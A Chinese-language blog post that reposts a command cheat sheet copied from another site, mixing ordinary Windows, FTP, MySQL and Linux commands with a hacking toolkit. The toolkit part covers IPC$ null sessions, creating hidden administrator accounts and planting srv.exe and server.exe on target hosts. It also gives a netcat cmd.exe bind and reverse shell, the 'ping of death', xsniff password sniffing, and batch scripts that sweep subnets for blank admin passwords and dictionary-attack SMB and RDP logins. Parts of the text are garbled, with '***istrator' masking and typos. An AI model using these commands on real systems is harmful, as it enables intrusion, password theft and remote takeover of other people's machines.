vincent's Blog

這些指令忘了在那個網站複製的, 但值得收藏備忘.#1 一：net use \\\\ip\\ipc$ " " /user:" " 建立IPC空鏈接net use \\\\ip\\ipc$ "密碼" /user:"用戶名" 建立IPC非空鏈接net use h: \\\\ip\\c$ "密碼" /user:"用戶名" 直接登陸后映射對方C：到本地為H:net use h: \\\\ip\\c$ 登陸后映射對方C：到本地為H:net use \\\\ip\\ipc$ /del 刪除IPC鏈接net use h: /del 刪除映射對方到本地的為H:的映射net user 用戶名　密碼　/add 建立用戶net user guest /active:yes 激活guest用戶net user 查看有哪些用戶net user 帳戶名 查看帳戶的屬性net localgroup ***istrators 用戶名 /add 把“用戶”添加到管理員中使其具有管理員權限,注意：***istrator后加s用復數net start 查看開啟了哪些服務net start 服務名　 開啟服務；(如:net start telnet， net start schedule)net stop 服務名 停止某服務net time \\\\目標ip 查看對方時間net time \\\\目標ip /set 設置本地計算机時間與“目標IP”主机的時間同步,加上參數/yes可取消确認信息net view 查看本地局域網內開啟了哪些共享net view \\\\ip 查看對方局域網內開啟了哪些共享net config 顯示系統網絡設置net logoff 斷開連接的共享net pause 服務名 暫停某服務net send ip "文本信息" 向對方發信息net ver 局域網內正在使用的網絡連接類型和信息net share 查看本地開啟的共享net share ipc$ 開啟ipc$共享net share ipc$ /del 刪除ipc$共享net share c$ /del 刪除C：共享net user guest 12345 用guest用戶登陸后用將密碼改為12345net password 密碼 更改系統登陸密碼netstat -a 查看開啟了哪些端口,常用netstat -annetstat -n 查看端口的網絡連接情況，常用netstat -annetstat -v 查看正在進行的工作netstat -p 協議名 例：netstat -p tcq/ip 查看某協議使用情況（查看tcp/ip協議使用情況）netstat -s 查看正在使用的所有協議使用情況nbtstat -A ip 對方136到139其中一個端口開了的話，就可查看對方最近登陸的用戶名（03前的為用戶名）-注意：參數-A要大寫tracert -參數 ip(或計算机名) 跟蹤路由（數据包），參數：“-w數字”用于設置超時間隔。ping ip(或域名) 向對方主机發送默認大小為32字節的數据，參數：“-l[空格]數据包大小”；“-n發送數据次數”；“-t”指一直ping。ping -t -l 65550 ip 死亡之ping(發送大于64K的文件並一直ping就成了死亡之ping)ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址，ipconfig可用參數“/all”顯示全部配置信息tlist -t 以樹行列表顯示進程(為系統的附加工具，默認是沒有安裝的，在安裝目錄的Support/tools文件夾內)kill -F 進程名 加-F參數后強制結束某進程(為系統的附加工具，默認是沒有安裝的，在安裝目錄的Support/tools文件夾內)del -F 文件名 加-F參數后就可刪除只讀文件,/AR、/AH、/AS、/AA分別表示刪除只讀、隱藏、系統、存檔文件，/A-R、/A-H、/A-S、/A-A表示刪除除只讀、隱藏、系統、存檔以外的文件。例如“DEL/AR *.*”表示刪除當前目錄下所有只讀文件，“DEL/A-S *.*”表示刪除當前目錄下除系統文件以外的所有文件#2 二：del /S /Q 目錄 或用：rmdir /s /Q 目錄 /S刪除目錄及目錄下的所有子目錄和文件。同時使用參數/Q 可取消刪除操作時的系統确認就直接刪除。（二個命令作用相同）move 盤符\\路徑\\要移動的文件名　存放移動文件的路徑\\移動后文件名 移動文件,用參數/y將取消确認移動目錄存在相同文件的提示就直接覆蓋fc one.txt two.txt > 3st.txt 對比二個文件並把不同之處輸出到3st.txt文件中，"> "和"> >" 是重定向命令at id號 開啟已注冊的某個計划任務at /delete 停止所有計划任務，用參數/yes則不需要确認就直接停止at id號 /delete 停止某個已注冊的計划任務at 查看所有的計划任務at \\\\ip time 程序名(或一個命令) /r 在某時間運行對方某程序並重新啟動計算机finger username @host 查看最近有哪些用戶登陸telnet ip 端口 遠和登陸服務器,默認端口為23open ip 連接到IP（屬telnet登陸后的命令）telnet 在本机上直接鍵入telnet 將進入本机的telnetcopy 路徑\\文件名1　路徑\\文件名2 /y 復制文件1到指定的目錄為文件2，用參數/y就同時取消确認你要改寫一份現存目錄文件copy c:\\srv.exe \\\\ip\\***$ 復制本地c:\\srv.exe到對方的***下cppy 1st.jpg/b+2st.txt/a 3st.jpg 將2st.txt的內容藏身到1st.jpg中生成3st.jpg新的文件，注：2st.txt文件頭要空三排，參數：/b指二進制文件，/a指ASCLL格式文件copy \\\\ip\\***$\\svv.exe c:\\ 或:copy\\\\ip\\***$\\*.* 復制對方***i$共享下的srv.exe文件（所有文件）至本地C：xcopy 要復制的文件或目錄樹　目標地址\\目錄名 復制文件和目錄樹，用參數/Y將不提示覆蓋相同文件tftp -i 自己IP(用肉机作跳板時這用肉机IP) get server.exe c:\\server.exe 登陸后，將“IP”的server.exe下載到目標主机c:\\server.exe 參數：-i指以二進制模式傳送，如傳送exe文件時用，如不加-i 則以ASCII模式（傳送文本文件模式）進行傳送tftp -i 對方IP　put c:\\server.exe 登陸后，上傳本地c:\\server.exe至主机ftp ip 端口 用于上傳文件至服務器或進行文件操作，默認端口為21。bin指用二進制方式傳送（可執行文件進）；默認為ASCII格式傳送(文本文件時)route print 顯示出IP路由，將主要顯示網絡地址Network addres，子網掩碼Netmask，網關地址Gateway addres，接口地址Interfacearp 查看和處理ARP緩存，ARP是名字解析的意思，負責把一個IP解析成一個物理性的MAC地址。arp -a將顯示出全部信息start 程序名或命令 /max 或/min 新開一個新窗口並最大化（最小化）運行某程序或命令mem 查看cpu使用情況attrib 文件名(目錄名) 查看某文件（目錄）的屬性attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存檔，只讀，系統，隱藏 屬性；用＋則是添加為某屬性dir 查看文件，參數：/Q顯示文件及目錄屬系統哪個用戶，/T:C顯示文件創建時間，/T:A顯示文件上次被訪問時間，/T:W上次被修改時間date /t 、 time /t 使用此參數即“DATE/T”、“TIME/T”將只顯示當前日期和時間，而不必輸入新日期和時間set 指定環境變量名稱=要指派給變量的字符 設置環境變量set 顯示當前所有的環境變量set p(或其它字符) 顯示出當前以字符p(或其它字符)開頭的所有環境變量pause 暫停批處理程序，並顯示出：請按任意鍵繼續....if 在批處理程序中執行條件處理（更多說明見if命令及變量）goto 標簽 將cmd.exe導向到批處理程序中帶標簽的行（標簽必須單獨一行，且以冒號打頭，例如：“：start”標簽）call 路徑\\批處理文件名 從批處理程序中調用另一個批處理程序 （更多說明見call /?）for 對一組文件中的每一個文件執行某個特定命令（更多說明見for命令及變量）echo on或off 打開或關閉echo，僅用echo不加參數則顯示當前echo設置echo 信息 在屏幕上顯示出信息echo 信息 >> pass.txt 將"信息"保存到pass.txt文件中findstr "Hello" aa.txt 在aa.txt文件中尋找字符串hellofind 文件名 查找某文件title 標題名字 更改CMD窗口標題名字color 顏色值 設置cmd控制台前景和背景顏色；0＝黑、1＝藍、2＝綠、3＝淺綠、4＝紅、5＝紫、6＝黃、7=白、8=灰、9=淡藍、A＝淡綠、B=淡淺綠、C=淡紅、D=淡紫、E=淡黃、F=亮白prompt 名稱 更改cmd.exe的顯示的命令提示符(把C:\\、D:\\統一改為：EntSky\\ )#3 三：ver 在DOS窗口下顯示版本信息winver 彈出一個窗口顯示版本信息（內存大小、系統版本、補丁版本、計算机名）format 盤符 /FS:類型 格式化磁盤,類型:FAT、FAT32、NTFS ,例：Format D: /FS:NTFSmd　目錄名 創建目錄replace 源文件　要替換文件的目錄 替換文件ren 原文件名　新文件名 重命名文件名tree 以樹形結构顯示出目錄，用參數-f 將列出第個文件夾中文件名稱type 文件名 顯示文本文件的內容more 文件名 逐屏顯示輸出文件doskey 要鎖定的命令＝字符doskey 要解鎖命令= 為DOS提供的鎖定命令(編輯命令行，重新調用win2k命令，並創建宏)。如：鎖定dir命令：doskey dir=entsky (不能用doskey dir=dir)；解鎖：doskey dir=taskmgr 調出任務管理器chkdsk /F D: 檢查磁盤D並顯示狀態報告；加參數/f並修復磁盤上的錯誤tlntadmn telnt服務admn,鍵入tlntadmn選擇3，再選擇8,就可以更改telnet服務默認端口23為其它任何端口exit 退出cmd.exe程序或目前，用參數/B則是退出當前批處理腳本而不是cmd.exepath 路徑\\可執行文件的文件名 為可執行文件設置一個路徑。cmd 啟動一個win2K命令解釋窗口。參數：/eff、/en 關閉、開啟命令擴展；更我詳細說明見cmd /?regedit /s 注冊表文件名 導入注冊表；參數/S指安靜模式導入，無任何提示；regedit /e 注冊表文件名 導出注冊表cacls 文件名　參數 顯示或修改文件訪問控制列表（ACL）——針對NTFS格式時。參數：/D 用戶名:設定拒絕某用戶訪問；/P 用戶名:perm 替換指定用戶的訪問權限；/G 用戶名:perm 賦予指定用戶訪問權限；Perm 可以是: N 無，R 讀取， W 寫入， C 更改(寫入)，F 完全控制；例：cacls D:\\test.txt /D pub 設定d:\\test.txt拒絕pub用戶訪問。cacls 文件名 查看文件的訪問用戶權限列表REM 文本內容 在批處理文件中添加注解netsh 查看或更改本地網絡配置情況#4 四：IIS服務命令：iisreset /reboot 重啟win2k計算机（但有提示系統將重啟信息出現）iisreset /start或stop 啟動（停止）所有Internet服務iisreset /restart 停止然后重新啟動所有Internet服務iisreset /status 顯示所有Internet服務狀態iisreset /enable或disable 在本地系統上啟用（禁用）Internet服務的重新啟動iisreset /rebootonerror 當啟動、停止或重新啟動Internet服務時，若發生錯誤將重新開机iisreset /noforce 若無法停止Internet服務，將不會強制終止Internet服務iisreset /timeout Val在到達逾時間（秒）時，仍未停止Internet服務，若指定/rebootonerror參數，則電腦將會重新開机。預設值為重新啟動20秒，停止60秒，重新開机0秒。FTP 命令： (后面有詳細說明內容)ftp的命令行格式為:ftp －v －d －i －n －g[主机名] －v 顯示遠程服務器的所有響應信息。－d 使用調試方式。－n 限制ftp的自動登錄,即不使用.netrc文件。－g 取消全局文件名。help [命令] 或 ？[命令] 查看命令說明bye 或 quit 終止主机FTP進程,並退出FTP管理方式.pwd 列出當前遠端主机目錄put 或 send 本地文件名 [上傳到主机上的文件名] 將本地一個文件傳送至遠端主机中get 或 recv [遠程主机文件名] [下載到本地后的文件名] 從遠端主机中傳送至本地主机中mget [remote-files] 從遠端主机接收一批文件至本地主机mput local-files 將本地主机中一批文件傳送至遠端主机dir 或 ls [remote-directory] [local-file] 列出當前遠端主机目錄中的文件.如果有本地文件,就將結果寫至本地文件ascii 設定以ASCII方式傳送文件(缺省值)bin 或 image 設定以二進制方式傳送文件bell 每完成一次文件傳送,報警提示cdup 返回上一級目錄close 中斷與遠程服務器的ftp會話(與open對應)open host[port] 建立指定ftp服務器連接,可指定連接端口delete 刪除遠端主机中的文件mdelete [remote-files] 刪除一批文件mkdir directory-name 在遠端主机中建立目錄rename [from] [to] 改變遠端主机中的文件名rmdir directory-name 刪除遠端主机中的目錄status 顯示當前FTP的狀態system 顯示遠端主机系統類型user user-name [password] [account] 重新以別的用戶名登錄遠端主机open host [port] 重新建立一個新的連接prompt 交互提示模式macdef 定義宏命令lcd 改變當前本地主机的工作目錄,如果缺省,就轉到當前用戶的HOME目錄chmod 改變遠端主机的文件權限case 當為ON時,用MGET命令拷貝的文件名到本地机器中,全部轉換為小寫字母cd remote－dir 進入遠程主机目錄cdup 進入遠程主机目錄的父目錄! 在本地机中執行交互shell，exit回到ftp環境,如!ls＊.zip#5 五：MYSQL 命令：mysql -h主机地址 -u用戶名 －p密碼 連接MYSQL;如果剛安裝好MYSQL，超級用戶root是沒有密碼的。（例：mysql -h110.110.110.110 -Uroot -P123456注:u與root可以不用加空格，其它也一樣）exit 退出MYSQLmysql*** -u用戶名 -p舊密碼 password 新密碼 修改密碼grant select on 數据庫.* to 用戶名@登錄主机 identified by \\"密碼\\"; 增加新用戶。（注意：和上面不同，下面的因為是MYSQL環境中的命令，所以后面都帶一個分號作為命令結束符）show databases; 顯示數据庫列表。剛開始時才兩個數据庫：mysql和test。mysql庫很重要它里面有MYSQL的系統信息，我們改密碼和新增用戶，實際上就是用這個庫進行操作。use mysql；show tables; 顯示庫中的數据表describe 表名; 顯示數据表的結构create database 庫名; 建庫use 庫名；create table 表名 (字段設定列表)； 建表drop database 庫名;drop table 表名； 刪庫和刪表delete from 表名; 將表中記錄清空select * from 表名; 顯示表中的記錄mysqldump --opt school>school.bbb 備份數据庫：（命令在DOS的\\\\mysql\\\\bin目錄下執行）;注釋:將數据庫school備份到school.bbb文件，school.bbb是一個文本文件，文件名任取，打開看看你會有新發現。win2003系統下新增命令（實用部份）：shutdown /參數 關閉或重啟本地或遠程主机。參數說明：/S 關閉主机，/R 重啟主机， /T 數字 設定延時的時間，范圍0～180秒之間， /A取消開机，/M //IP 指定的遠程主机。例：shutdown /r /t 0 立即重啟本地主机（無延時）taskill /參數 進程名或進程的pid 終止一個或多個任務和進程。參數說明：/PID 要終止進程的pid,可用tasklist命令獲得各進程的pid，/IM 要終止的進程的進程名，/F 強制終止進程，/T 終止指定的進程及他所啟動的子進程。tasklist 顯示當前運行在本地和遠程主机上的進程、服務、服務各進程的進程標識符(PID)。參數說明：/M 列出當前進程加載的dll文件，/SVC 顯示出每個進程對應的服務，無參數時就只列出當前的進程。#6 六：Linux系統下基本命令： 要區分大小寫uname 顯示版本信息（同win2K的 ver）dir 顯示當前目錄文件,ls -al 顯示包括隱藏文件（同win2K的 dir）pwd 查詢當前所在的目錄位置cd cd　..回到上一層目錄，注意cd 與..之間有空格。cd　/返回到根目錄。cat 文件名 查看文件內容cat >abc.txt 往abc.txt文件中寫上內容。more 文件名 以一頁一頁的方式顯示一個文本文件。cp 復制文件mv 移動文件rm 文件名 刪除文件，rm -a 目錄名刪除目錄及子目錄mkdir 目錄名 建立目錄rmdir 刪除子目錄，目錄內沒有文檔。chmod 設定檔案或目錄的存取權限grep 在檔案中查找字符串diff 檔案文件比較find 檔案搜尋date 現在的日期、時間who 查詢目前和你使用同一台机器的人以及Login時間地點w 查詢目前上机者的詳細資料whoami 查看自己的帳號名稱groups 查看某人的Grouppasswd 更改密碼history 查看自己下過的命令ps 顯示進程狀態kill 停止某進程gcc 黑客通常用它來編譯C語言寫的文件su 權限轉換為指定使用者telnet IP telnet連接對方主机（同win2K），當出現bash$時就說明連接成功。ftp ftp連接上某服務器（同win2K）批處理命令與變量:1：for命令及變量 基本格式：FOR /參數 %variable IN (set) DO command [command_parameters] %variable:指定一個單一字母可替換的參數，如：%i ，而指定一個變量則用：%%i ，而調用變量時用：%i% ，變量是區分大小寫的（%i 不等于 %I）。批處理每次能處理的變量從%0—%9共10個，其中%0默認給批處理文件名使用，%1默認為使用此批處理時輸入的的第一個值，同理：%2—%9指輸入的第2-9個值；例：net use \\\\ip\\ipc$ pass /user:user 中ip為%1,pass為%2 ,user為%3(set):指定一個或一組文件，可使用通配符，如：(D:\\user.txt)和(1 1 254)(1 -1 254),{ “(1 1 254)”第一個"1"指起始值，第二個"1"指增長量，第三個"254"指結束值，即：從1到254；“(1 -1 254)”說明：即從254到1 }command：指定對第個文件執行的命令，如：net use命令；如要執行多個命令時，命令這間加：& 來隔開command_parameters：為特定命令指定參數或命令行開關IN (set)：指在(set)中取值；DO command ：指執行command參數：/L 指用增量形式{ (set)為增量形式時 }；/F 指從文件中不斷取值，直到取完為止{ (set)為文件時，如(d:\\pass.txt)時 }。用法舉例：@echo offecho 用法格式：test.bat *.*.* > test.txtfor /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use \\\\%1.%%G /user:***istrator find "命令成功完成" >>test.txt存為test.bat 說明：對指定的一個C類網段的254個IP依次試建立***istrator密碼為空的IPC$連接，如果成功就把該IP存在test.txt中。/L指用增量形式（即從1-254或254-1）；輸入的IP前面三位：*.*.*為批處理默認的 %1；%%G 為變量(ip的最后一位）；& 用來隔開echo 和net use 這二個命令； 指建立了ipc$后，在結果中用find查看是否有"命令成功完成"信息；%1.%%G 為完整的IP地址；(1 1 254) 指起始值，增長量，結止值。@echo offecho 用法格式：ok.bat ipFOR /F %%i IN (D:\\user.dic) DO smb.exe %1 %%i D:\\pass.dic 200存為：ok.exe 說明：輸入一個IP后，用字典文件d:\\pass.dic來暴解d:\\user.dic中的用戶密碼，直到文件中值取完為止。%%i為用戶名；%1為輸入的IP地址（默認）。#7 七：2：if命令及變量 基本格式：IF [not] errorlevel 數字 命令語句 如果程序運行最后返回一個等于或大于指定數字的退出編碼，指定條件為“真”。例：IF errorlevel 0 命令 指程序執行后返回的值為0時，就值行后面的命令；IF not errorlevel 1 命令指程序執行最后返回的值不等于1，就執行后面的命令。0 指發現並成功執行（真）；1 指沒有發現、沒執行（假）。IF [not] 字符串1==字符串2 命令語句 如果指定的文本字符串匹配（即：字符串1 等于 字符串2），就執行后面的命令。例：“if "%2%"=="4" goto start”指：如果輸入的第二個變量為4時，執行后面的命令（注意：調用變量時就%變量名%並加" "）IF [not] exist 文件名 命令語句 如果指定的文件名存在，就執行后面的命令。例：“if not nc.exe goto end”指：如果沒有發現nc.exe文件就跳到":end"標簽處。IF [not] errorlevel 數字 命令語句 else 命令語句或 IF [not] 字符串1==字符串2 命令語句 else 命令語句或 IF [not] exist 文件名 命令語句 else 命令語句 加上：else 命令語句后指：當前面的條件不成立時，就指行else后面的命令。注意：else 必須與 if 在同一行才有效。 當有del命令時需把del命令全部內容用< >括起來，因為del命令要單獨一行時才能執行，用上< >后就等于是單獨一行了；例如：“if exist test.txt. else echo test.txt.missing ”，注意命令中的“.”（二）系統外部命令(均需下載相關工具)：1、瑞士軍刀：nc.exe參數說明：-h 查看幫助信息-d 后台模式-e prog程序重定向，一但連接就執行〔危險〕-i secs延時的間隔-l 監听模式，用于入站連接-L 監听模式，連接天閉后仍然繼續監听，直到CTR+C-n IP地址，不能用域名-o film記錄16進制的傳輸-p[空格]端口 本地端口號-r 隨机本地及遠程端口-t 使用Telnet交互方式-u UDP模式-v 詳細輸出，用-vv將更詳細-w數字 timeout延時間隔-z 將輸入，輸出關掉（用于掃錨時）基本用法：nc -nvv 192.168.0.1 80 連接到192.168.0.1主机的80端口nc -l -p 80 開啟本机的TCP 80端口並監听nc -nvv -w2 -z 192.168.0.1 80-1024 掃錨192.168.0.1的80-1024端口nc -l -p 5354 -t -e c:winntsystem32cmd.exe 綁定remote主机的cmdshell在remote的TCP 5354端口nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 梆定remote主机的cmdshell並反向連接192.168.0.2的5354端口高級用法：nc -L -p 80 作為蜜罐用1：開啟並不停地監听80端口，直到CTR+C為止nc -L -p 80 > c:\\log.txt 作為蜜罐用2：開啟並不停地監听80端口，直到CTR+C,同時把結果輸出到c:\\log.txtnc -L -p 80 <> 存放文件的路徑及名稱 傳送文件到對方主机備 注：管道命令< 或 > 重定向命令。“<”，例如：tlntadmn <>> d:\\log.txt 意思是：后台執行dir，並把結果存在d:\\log.txt中>與>>的區別 　">"指：覆蓋；">>"指：保存到(添加到）。如：@dir c:\\winnt >> d:\\log.txt和@dir c:\\winnt > d:\\log.txt二個命令分別執行二次比較看：用>>的則是把二次的結果都保存了，而用：>則只有一次的結果，是因為第二次的結果把第一次的覆蓋了。#8 八：2、掃錨工具：xscan.exe基本格式xscan -host <起始IP>[-<終止IP>] <檢測項目> [其他選項] 掃錨"起始IP到終止IP"段的所有主机信息xscan -file <主机列表文件名> <檢測項目> [其他選項] 掃錨"主机IP列表文件名"中的所有主机信息檢測項目-active 檢測主机是否存活-os 檢測遠程操作系統類型（通過NETBIOS和SNMP協議）-port 檢測常用服務的端口狀態-ftp 檢測FTP弱口令-pub 檢測FTP服務匿名用戶寫權限-pop3 檢測POP3-Server弱口令-smtp 檢測SMTP-Server漏洞-sql 檢測SQL-Server弱口令-smb 檢測NT-Server弱口令-iis 檢測IIS編碼/解碼漏洞-cgi 檢測CGI漏洞-nasl 加載Nessus攻擊腳本-all 檢測以上所有項目其它選項-i 適配器編號 設置網絡適配器, <適配器編號>可通過"-l"參數獲取-l 顯示所有網絡適配器-v 顯示詳細掃描進度-p 跳過沒有響應的主机-o 跳過沒有檢測到開放端口的主机　 -t 並發線程數量,並發主机數量 指定最大並發線程數量和並發主机數量, 默認數量為100,10-log 文件名 指定掃描報告文件名 (后綴為：TXT或HTML格式的文件)用法示例xscan -host 192.168.1.1-192.168.255.255 -all -active -p　 檢測192.168.1.1-192.168.255.255網段內主机的所有漏洞，跳過無響應的主机xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o 檢測192.168.1.1-192.168.255.255網段內主机的標准端口狀態，NT弱口令用戶，最大並發線程數量為150，跳過沒有檢測到開放端口的主机xscan -file hostlist.txt -port -cgi -t 200,5 -v -o 檢測“hostlist.txt”文件中列出的所有主机的標准端口狀態，CGI漏洞，最大並發線程數量為200，同一時刻最多檢測5台主机，顯示詳細檢測進度，跳過沒有檢測到開放端口的主机www.jz5u.com#9 九：3、命令行方式嗅探器: xsniff.exe可捕獲局域網內FTP/SMTP/POP3/HTTP協議密碼參數說明-tcp 輸出TCP數据報-udp 輸出UDP數据報-icmp 輸出ICMP數据報-pass 過濾密碼信息-hide 后台運行-host 解析主机名-addr IP地址 過濾IP地址-port 端口 過濾端口-log 文件名 將輸出保存到文件-asc 以ASCII形式輸出-hex 以16進制形式輸出用法示例xsniff.exe -pass -hide -log pass.log 后台運行嗅探密碼並將密碼信息保存在pass.log文件中xsniff.exe -tcp -udp -asc -addr 192.168.1.1 嗅探192.168.1.1並過濾tcp和udp信息並以ASCII格式輸出4、終端服務密碼破解: tscrack.exe參數說明-h 顯示使用幫助-v 顯示版本信息-s 在屏幕上打出解密能力-b 密碼錯誤時發出的聲音-t 同是發出多個連接（多線程）-N Prevent System Log entries on targeted server-U 卸載移除tscrack組件-f 使用－f后面的密碼-F 間隔時間（頻率）-l 使用－l后面的用戶名-w 使用－w后面的密碼字典-p 使用－p后面的密碼-D 登錄主頁面用法示例tscrack 192.168.0.1 -l ***istrator -w pass.dic 遠程用密碼字典文件暴破主机的***istrator的登陸密碼tscrack 192.168.0.1 -l ***istrator -p 123456 用密碼123456遠程登陸192.168.0.1的***istrator用戶@if not exist ipcscan.txt goto noscan@for /f "tokens=1 delims= " %%i in (3389.txt) do call hack.bat %%inscan@echo 3389.txt no find or scan faild(?存為3389.bat) （假設現有用SuperScan或其它掃錨器掃到一批開有3389的主机IP列表文件3389.txt)3389.bat意思是：從3389.txt文件中取一個IP，接著運行hack.bat@if not exist tscrack.exe goto noscan@tscrack %1 -l ***istrator -w pass.dic >>rouji.txt:noscan@echo tscrack.exe no find or scan faild(?存為hack.bat) (運行3389.bat就OK，且3389.bat、hack.bat、3389.txt、pass.dic與tscrack.exe在同一個目錄下；就可以等待結果了)hack.bat意思是：運行tscrack.exe用字典暴破3389.txt中所有主机的***istrator密碼，並將破解結果保存在rouji.txt文件中。5、其它：Shutdown.exeShutdown \\\\IP地址 t:20 20秒后將對方NT自動關閉（Windows 2003系統自帶工具，在Windows2000下用進就得下載此工具才能用。在前面Windows 2003 DOS命令中有詳細介紹。）fpipe.exe (TCP端口重定向工具) 在第二篇中有詳細說明（端口重定向繞過防火墻）fpipe -l 80 -s 1029 -r 80 www.sina.com.cn 當有人掃錨你的80端口時，他掃到的結果會完全是www.sina.com.cn的主机信息Fpipe -l 23 -s 88 -r 23 目標IP 把本机向目標IP發送的23端口Telnet請求經端口重定向后，就通過88端口發送到目標IP的23端口。（與目標IP建立Telnet時本机就用的88端口與其相連接）然后：直接Telnet 127.0.0.1（本机IP）就連接到目標IP的23端口了。OpenTelnet.exe (遠程開啟telnet工具)opentelnet.exe \\\\IP 帳號　密碼　ntlm認証方式　Telnet端口 （不需要上傳ntlm.exe破坏微軟的身份驗証方式）直接遠程開啟對方的telnet服務后，就可用telnet \\\\ip 連接上對方。NTLM認証方式：０：不使用NTLM身份驗証；１：先嘗試NTLM身份驗証，如果失敗，再使用用戶名和密碼；２：只使用NTLM身份驗証。ResumeTelnet.exe (OpenTelnet附帶的另一個工具)resumetelnet.exe \\\\IP　帳號　密碼 用Telnet連接完對方后，就用這個命令將對方的Telnet設置還原，並同時關閉Telnet服務。#10 十：6、FTP命令詳解：FTP命令是Internet用戶使用最頻繁的命令之一，熟悉並靈活應用FTP的內部命令，可以大大方便使用者，並收到事半功倍之效。如果你想學習使用進行后台FTP下載，那麼就必須學習FTP指令。FTP的命令行格式為：ftp -v -d -i -n -g [主机名] ，其中-v 顯示遠程服務器的所有響應信息；-n 限制ftp的自動登錄，即不使用；.n etrc文件；-d 使用調試方式；-g 取消全局文件名。FTP使用的內部命令如下(中括號表示可選項):1.![cmd[args]]：在本地机中執行交互shell，exit回到ftp環境，如：!ls*.zip2.$ macro-ame[args]： 執行宏定義macro-name。3.account[password]： 提供登錄遠程系統成功后訪問系統資源所需的補充口令。4.append local-file[remote-file]：將本地文件追加到遠程系統主机，若未指定遠程系統文件名，則使用本地文件名。5.ascii：使用ascii類型傳輸方式。6.bell：每個命令執行完畢后計算机響鈴一次。7.bin：使用二進制文件傳輸方式。8.bye：退出ftp會話過程。9.case：在使用mget時，將遠程主机文件名中的大寫轉為小寫字母。10.cd remote-dir：進入遠程主机目錄。11.cdup：進入遠程主机目錄的父目錄。12.chmod mode file-name：將遠程主机文件file-name的存取方式設置為mode，如：chmod 777 a.out。13.close：中斷與遠程服務器的ftp會話(與open對應)。14.cr：使用asscii方式傳輸文件時，將回車換行轉換為回行。15.delete remote-file：刪除遠程主机文件。16.debug[debug-value]：設置調試方式， 顯示發送至遠程主机的每條命令，如：deb up 3，若設為0，表示取消debug。17.dir[remote-dir][local-file]：顯示遠程主机目錄，並將結果存入本地文件。18.disconnection：同close。19.form format：將文件傳輸方式設置為format，缺省為file方式。20.get remote-file[local-file]： 將遠程主机的文件remote-file傳至本地硬盤的local-file。21.glob：設置mdelete，mget，mput的文件名擴展，缺省時不擴展文件名，同命令行的-g參數。22.hash：每傳輸1024字節，顯示一個hash符號(#)。23.help[cmd]：顯示ftp內部命令cmd的幫助信息，如：help get。24.idle[seconds]：將遠程服務器的休眠計時器設為[seconds]秒。25.image：設置二進制傳輸方式(同binary)。26.lcd[dir]：將本地工作目錄切換至dir。27.ls[remote-dir][local-file]：顯示遠程目錄remote-dir， 並存入本地文件local-file。28.macdef macro-name：定義一個宏，遇到macdef下的空行時，宏定義結束。29.mdelete[remote-file]：刪除遠程主机文件。30.mdir remote-files local-file：與dir類似，但可指定多個遠程文件，如 ：mdir *.o.*.zipoutfile 。31.mget remote-files：傳輸多個遠程文件。32.mkdir dir-name：在遠程主机中建一目錄。33.mls remote-file local-file：同nlist，但可指定多個文件名。34.mode[modename]：將文件傳輸方式設置為modename， 缺省為stream方式。35.modtime file-name：顯示遠程主机文件的最后修改時間。36.mput local-file：將多個文件傳輸至遠程主机。37.newer file-name： 如果遠程机中file-name的修改時間比本地硬盤同名文件的時間更近，則重傳該文件。38.nlist[remote-dir][local-file]：顯示遠程主机目錄的文件清單，並存入本地硬盤的local-file。39.nmap[inpattern outpattern]：設置文件名映射机制， 使得文件傳輸時，文件中的某些字符相互轉換， 如：nmap $1.$2.$3[$1，$2].[$2，$3]，則傳輸文件a1.a2.a3時，文件名變為a1，a2。 該命令特別適用于遠程主机為非UNIX机的情況。40.ntrans[inchars[outchars]]：設置文件名字符的翻譯机制，如ntrans1R，則文件名LLL將變為RRR。41.open host[port]：建立指定ftp服務器連接，可指定連接端口。42.passive：進入被動傳輸方式。43.prompt：設置多個文件傳輸時的交互提示。44.proxy ftp-cmd：在次要控制連接中，執行一條ftp命令， 該命令允許連接兩個ftp服務器，以在兩個服務器間傳輸文件。第一條ftp命令必須為open，以首先建立兩個服務器間的連接。45.put local-file[remote-file]：將本地文件local-file傳送至遠程主机。46.pwd：顯示遠程主机的當前工作目錄。47.quit：同bye，退出ftp會話。48.quote arg1，arg2...：將參數逐字發至遠程ftp服務器，如：quote syst.49.recv remote-file[local-file]：同get。50.reget remote-file[local-file]：類似于get， 但若local-file存在，則從上次傳輸中斷處續傳。51.rhelp[cmd-name]：請求獲得遠程主机的幫助。52.rstatus[file-name]：若未指定文件名，則顯示遠程主机的狀態， 否則顯示文件狀態。53.rename[from][to]：更改遠程主机文件名。54.reset：清除回答隊列。55.restart marker：從指定的標志marker處，重新開始get或put，如：restart 130。56.rmdir dir-name：刪除遠程主机目錄。57.runique：設置文件名只一性存儲，若文件存在，則在原文件后加后綴.1， .2等。58.send local-file[remote-file]：同put。59.sendport：設置PORT命令的使用。60.site arg1，arg2...：將參數作為SITE命令逐字發送至遠程ftp主机。61.size file-name：顯示遠程主机文件大小，如：site idle 7200。62.status：顯示當前ftp狀態。www.jz5u.com63.struct[struct-name]：將文件傳輸結构設置為struct-name， 缺省時使用stream結构。64.sunique：將遠程主机文件名存儲設置為只一(與runique對應)。65.system：顯示遠程主机的操作系統類型。66.tenex：將文件傳輸類型設置為TENEX机的所需的類型。67.tick：設置傳輸時的字節計數器。68.trace：設置包跟蹤。69.type[type-name]：設置文件傳輸類型為type-name，缺省為ascii，如:type binary，設置二進制傳輸方式。70.umask[newmask]：將遠程服務器的缺省umask設置為newmask，如：umask 371.user user-name[password][account]：向遠程主机表明自己的身份，需要口令時，必須輸入口令，如：user anonymous my@email。72.verbose：同命令行的-v參數，即設置詳盡報告方式，ftp 服務器的所有響 應都將顯示給用戶，缺省為on.73.?[cmd]：同help.#11 十一：7：計算机運行命令全集 winver---------檢查Windows版本wmimgmt.msc----打開windows管理體系結构wupdmgr--------windows更新程序winver---------檢查Windows版本wmimgmt.msc----打開windows管理體系結构wupdmgr--------windows更新程序wscript--------windows腳本宿主設置write----------寫字板winmsd-----系統信息wiaacmgr-------掃描儀和照相机向導winchat--------XP自帶局域網聊天mem.exe--------顯示內存使用情況Msconfig.exe---系統配置實用程序mplayer2-------簡易widnows media playermspaint--------畫圖板mstsc----------遠程桌面連接mplayer2-------媒體播放机magnify--------放大鏡實用程序mmc------------打開控制台mobsync--------同步命令dxdiag---------檢查DirectX信息drwtsn32------ 系統醫生devmgmt.msc--- 